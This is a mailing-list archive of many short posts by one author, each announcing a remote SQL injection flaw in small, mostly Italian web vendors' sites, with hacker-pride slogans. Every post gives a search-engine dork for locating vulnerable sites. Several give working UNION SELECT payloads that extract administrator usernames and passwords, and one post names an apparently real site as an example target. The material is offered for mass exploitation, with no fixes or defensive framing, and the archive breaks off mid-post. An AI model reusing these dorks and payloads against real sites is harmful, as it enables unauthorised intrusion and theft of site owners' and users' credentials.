#
#
#
##
##

Dork : Manifattura Web inurl:prodotto.php?id=

Exploite:

www.victim.com/prodotto.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Editel (news-dettaglio.php?id) Remote SQL injection Vulnerability

2011-09-06 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Editel (news-dettaglio.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.editeltn.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Realizzazione sito: Editel inurl:news-dettaglio.php?id=

Exploite:

www.victim.com/news-dettaglio.php?id=+28+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users

OR:

www.victim.com/news-dettaglio.php?id=+9+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9+from+utenti--

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


BvCom (dettaglio.php?idnews) Remote SQL injection Vulnerability

2011-09-06 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## BvCom (dettaglio.php?idnews)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.bvcom.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by: bvcom.it inurl:dettaglio.php?idnews=

Exploite:

www.victim.com/news/dettaglio.php?idnews=-9+union+select+1,2,user(),4,version(),6,7,8--

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


WSTAFF Remote SQL injection Vulnerability

2011-09-06 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## WSTAFF
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.wstaff.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by: WSTAFF srl

Exploite:

www.victim.com/prodotti.php?codice=-5 union select 1,2,3,user,password from 
admin

www.victim.com/ricetta.php?id=-9/**/union/**/select/**/9,user,9,9,password,9,9/**/from/**/admin

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


MaiNick (ricetta.php?id) Remote SQL injection Vulnerability

2011-09-06 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## MaiNick (ricetta.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.mainickweb.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Designed by MaiNick inurl:ricetta.php?id=

Exploite:

www.victim.com/ricetta.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Abarkam (detail.php?input) Remote SQL injection Vulnerability

2011-09-06 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Abarkam (detail.php?input)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.abarkam.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : allinurl:detail.php?input=

Exploite:

www.victim.com/detail.php?input=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


TTW (ricetta.php?id) Remote SQL injection Vulnerability

2011-09-06 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## TTW (ricetta.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.tamtamsrl.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : credits ttw inurl:ricetta.php?id=

Exploite:

www.victim.com/ricetta.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


ITTWeb Remote SQL injection Vulnerability

2011-09-02 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## ITTWeb
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.ittweb.net/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Web Design By I.T.T inurl:?id=

Exploite:

www.victim.com/prodotto.php?id=[SQL]

www.victim.com/index.php?command=searchtype=newsid=[SQL]
#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Sana Net (viewpages.php?id) Remote SQL injection Vulnerability

2011-09-01 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Sana Net (viewpages.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.sana-net.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : inurl:viewpages.php?id= #1591;#1585;#1575;#1581;#1610; #1608; 
#1576;#1585;#1606;#1575;#1605;#1607; #1606;#1608;#1740;#1587;#1740; 
#1575;#1586; #1588;#1585;#1705;#1578; 
#1591;#1585;#1575;#1581;#1575;#1606; #1587;#1606;#1575; #1606;#1578;

Exploite:

www.victim.com/viewgal.php?op=-1 union select 
1,concat(username,0x3a,password),3,4 from manager


#
Admin Panel : www.victim.com/adminsite/login-form.php
#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


Olonet (prodotto.php?idproduct) Remote SQL injection Vulnerability

2011-09-01 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Olonet (prodotto.php?idproduct)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.olonet.net/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered  designed by Olonet.net

Exploite:

www.victim.com/prodotto.php?idproduct=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Mediagrafic (prodotto.asp?id) (records.asp?id_p) Remote SQL injection Vulnerability

2011-08-31 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Mediagrafic (prodotto.asp?id) (records.asp?id_p)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.mediagrafic.eu/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Mediagrafic.it

Exploite:

www.victim.com/prodotto.asp?id=-1992 union select 
1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from config

www.victim.com/records.asp?id_p=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


CWM (dettaglio-prodotto.asp?id) Remote SQL injection Vulnerability

2011-08-31 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## CWM (dettaglio-prodotto.asp?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.cynaskyweb.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Powered by CWM inurl:dettaglio-prodotto.asp?id=

Exploite:

www.victim.com/dettaglio-prodotto.asp?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Sana Net (viewnews.php?id) Remote SQL injection Vulnerability

2011-08-31 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Sana Net (viewnews.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.sana-net.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : inurl:viewnews.php?id= #1591;#1585;#1575;#1581;#1610; #1608; 
#1576;#1585;#1606;#1575;#1605;#1607; #1606;#1608;#1740;#1587;#1740; 
#1575;#1586; #1588;#1585;#1705;#1578; 
#1591;#1585;#1575;#1581;#1575;#1606; #1587;#1606;#1575; #1606;#1578;

Exploite:

www.victim.com/viewnews.php?id=-null/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null/**/from/**/manager

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


bizConsulting (prodotto.php?id) Remote SQL injection Vulnerability

2011-08-30 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## bizConsulting (prodotto.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.bizconsulting.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by: bizConsulting inurl:prodotto.php?id=

Exploite:

www.victim.com/prodotto.php?id=-1 union select concat(username,0x3a,password),2 
from adm_amministratori

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


webyuss (prodotto.php?id) (quadri.php?id) Remote SQL injection Vulnerability

2011-08-30 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## webyuss (prodotto.php?id) (quadri.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.webyuss.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by webyuss inurl:prodotto.php?id=

Exploite:

www.victim.com/prodotto.php?id=[SQL]


Dork : Powered by webyuss inurl:quadri.php?id=

Exploite:

www.victim.com/quadri.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Pc Web Agency (prodotto.php?id) Remote SQL injection Vulnerability

2011-08-30 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Pc Web Agency (prodotto.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.pcwebagency.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Pc Web Agency inurl:prodotto.php?id=

Exploite:

www.victim.com/prodotto.php?id=-Null union select 
1,user,pswd,4,5,6,7,8,9,10,11,12,13,14,15,16 from login

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   


phpWebSite (publisher) Remote SQL injection Vulnerability

2011-08-29 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## phpWebSite (publisher)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : allinurl:mod.php?mod=publisher

Exploite:

www.victim.com/mod.php?mod=publisherop=allmediaartid=-1 union select 
concat(aid,0x3a,pwd) from authors


Exploite 2 :

www.victim.com/mod.php?mod=publisherop=allmediaartid=-1 union select 
concat(aid,0x3a,pwd) from authors

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Fabio Rispoli (prodotto.php?id) Remote SQL injection Vulnerability

2011-08-29 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Fabio Rispoli (prodotto.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Powered by Fabio Rispoli

Exploite:

www.victim.com/prodotto.php?id=6+union+select 
1,username,password,4,5,Null+from+utenti--

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Marketing Development (prodotto.php?cat) Remote SQL injection Vulnerability

2011-08-29 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Marketing  Development (prodotto.php?cat)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.marketingdev.com
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  powered by Marketing  Development inurl:prodotto.php?cat=

Exploite:

www.victim.com/prodotto.php?cat=[SQl]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Datriks Solutions (prodotto.php?id) (dettaglio_socio.php?id) Remote SQL injection Vulnerability

2011-08-29 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Datriks Solutions (prodotto.php?id) (dettaglio_socio.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.datriks.net/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Powered by Datriks Solutions inurl:prodotto.php?id=

Exploite:

www.victim.com/new/prodotto.php?id=[SQl]


Dork : Powered by Datriks Solutions inurl:dettaglio_socio.php?id=

Exploite:

www.victim.com/dettaglio_socio.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Multimedia Creative (prodotto.php?id) Remote SQL injection Vulnerability

2011-08-29 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Multimedia Creative (prodotto.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.multimediacreative.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Multimedia Creative inurl:prodotto.php?id=

Exploite:

www.victim.com/prodotto.php?id=[SQl]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


B-Keen communication (dettaglio_news.phpid) Remote SQL injection Vulnerability

2011-08-26 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## B-Keen communication (dettaglio_news.phpid)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.b-keen.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by B-Keen communication inurl:dettaglio_news.php

Exploite:

www.victim.com/index.php?pagina=dettaglio_news.phpid=[SQL]

Example :

http://www.victim.com/index.php?pagina=dettaglio_news.phpid=0 union select 
null,null,@@version,database(),null,null,null,null,null--

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   
  


BUZLAB (prodotti.php?idCategoria) Remote SQL injection Vulnerability

2011-08-26 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## BUZLAB (prodotti.php?idCategoria)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.buzlab.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Produced by BUZLAB inurl:prodotti.php?idCategoria=

Exploite:

www.victim.com/prodotti.php?idCategoria=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


Foresta Creativa (prodotti.php?idCategoria) Remote SQL injection Vulnerability

2011-08-26 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Foresta Creativa (prodotti.php?idCategoria)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.forestacreativa.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Foresta Creativa inurl:prodotti.php?idCategoria=

Exploite:

www.victim.com/prodotti.php?idCategoria=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Web Progetto (prodotti.php?idcategoria) Remote SQL injection Vulnerability

2011-08-26 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Web Progetto (prodotti.php?idcategoria)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.webprogetto.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : by Web Progetto inurl:prodotti.php?idcategoria=

Exploite:

www.victim.com/prodotti.php?idcategoria=-9+union+select+1,user,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17
 from auth_user--

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##  


Marinet Remote SQL injection Vulnerability

2011-08-26 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Marinet
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.marinet.gr/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Marinet inurl:products.php?categoryid=

Exploite :

www.victim.com/products.php?categoryid=[SQL]

Example :

http://www.bestsecurity.gr/products.php?categoryid=1'


Dork : Powered by Marinet inurl:location.php?id=

Exploite:

www.victim.com/location.php?id=[SQL]


Dork : Powered by Marinet inurl:info-more.php?id=

Exploite:

www.victim.com/info-more.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Marinet Remote SQL injection Vulnerability

2011-08-26 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Marinet
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.marinet.gr/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Marinet inurl:products.php?categoryid=

Exploite :

www.victim.com/products.php?categoryid=[SQL]


Dork : Powered by Marinet inurl:location.php?id=

Exploite:

www.victim.com/location.php?id=[SQL]


Dork : Powered by Marinet inurl:info-more.php?id=

Exploite:

www.victim.com/info-more.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Web Art Studio (prodotto.php?lang) Remote SQL injection Vulnerability

2011-08-26 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Web Art Studio (prodotto.php?lang)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.was.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Web Art Studio Web Agency inurl:prodotto.php?lang=

Exploite:

www.victim.com/prodotto.php?lang=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Listendifferent (prodotto.php?IDprodotto) Remote SQL injection Vulnerability

2011-08-26 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Listendifferent (prodotto.php?IDprodotto)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.listendifferent.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Concept and Designed by Listendifferent.com

Exploite:

www.victim.com/fra/prodotto.php?IDprodotto=-9 union select 
1,version(),user(),6,5,6,7,8,9,10

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


ValtNet (photogallery.html?id_categoria) Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## ValtNet (photogallery.html?id_categoria)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.valtnet.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : allinurl:photogallery.html?id_categoria=

Exploite:

www.victim.com/photogallery.html?id_categoria=-0 union select 
1,2,concat(username,0x3a,password),4,5,6 from v_utente

Or :

www.victim.com/photogallery.html?id_categoria=-0 union select 
1,2,concat(username,0x3a,password),4,5 from v_utente

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


CreatiWeb Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## CreatiWeb 
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.crweb.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by CreatiWeb inurl:dettaglio_news.php?id=

Exploite: 

www.victim.com/dettaglio_news.php?id=[SQL]


Dork : Powered by CreatiWeb inurl:photo.php?album=

Exploite : 

www.victim.com/photo.php?album=[SQL]


Dork : Powered by CreatiWeb inurl:gallery.asp?id=

Exploite :

www.victim.com/gallery.asp?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Alfazeta (list-prodotti.php?idcategoria) Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Alfazeta (list-prodotti.php?idcategoria)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.alfazeta.net/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : inurl:list-prodotti.php?idcategoria=

Exploite:

www.victim.com/list-prodotti.php?idcategoria=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Warah Agencia (productos.php?categoria_id) Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Warah Agencia (productos.php?categoria_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.warah.com.ar/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : DESIGN BY WARAH AGENCIA CREATIVA

Exploite:

www.victim.com/productos.php?categoria_id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Simply Media Web (archivio.asp?categoria_id) Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Simply Media Web (archivio.asp?categoria_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.simplymediaweb.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Simply Media Web inurl:archivio.asp?categoria_id=

Exploite:

www.victim.com/archivio.asp?categoria_id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Dataminas (noticias.php?categoria_id) (galeria.php?galeria_id) Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Dataminas (noticias.php?categoria_id) (galeria.php?galeria_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.dataminas.com.br/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by DATAMINAS.COM.BR

Exploite:

www.victim.com/noticias.php?categoria_id=[SQL]

www.victim.com/galeria.php?galeria_id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Nafis Group (review.php?ID) Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Nafis Group (review.php?ID)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by : Nafis Group

Exploite:

www.victim.com/review.php?ID=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Nativedreams (Fabarth_gallery.php?categoria_id) Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Nativedreams (Fabarth_gallery.php?categoria_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.nativedreams.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : inurl:Fabarth_gallery.php?categoria_id=

Exploite:

www.victim.com/Fabarth_gallery.php?categoria_id=1+union+select+1,2,version(),4,5,6

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Data Center Foz (product_cat.php?CATEGORIA_ID) Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Data Center Foz (product_cat.php?CATEGORIA_ID)
##   
###
###
###
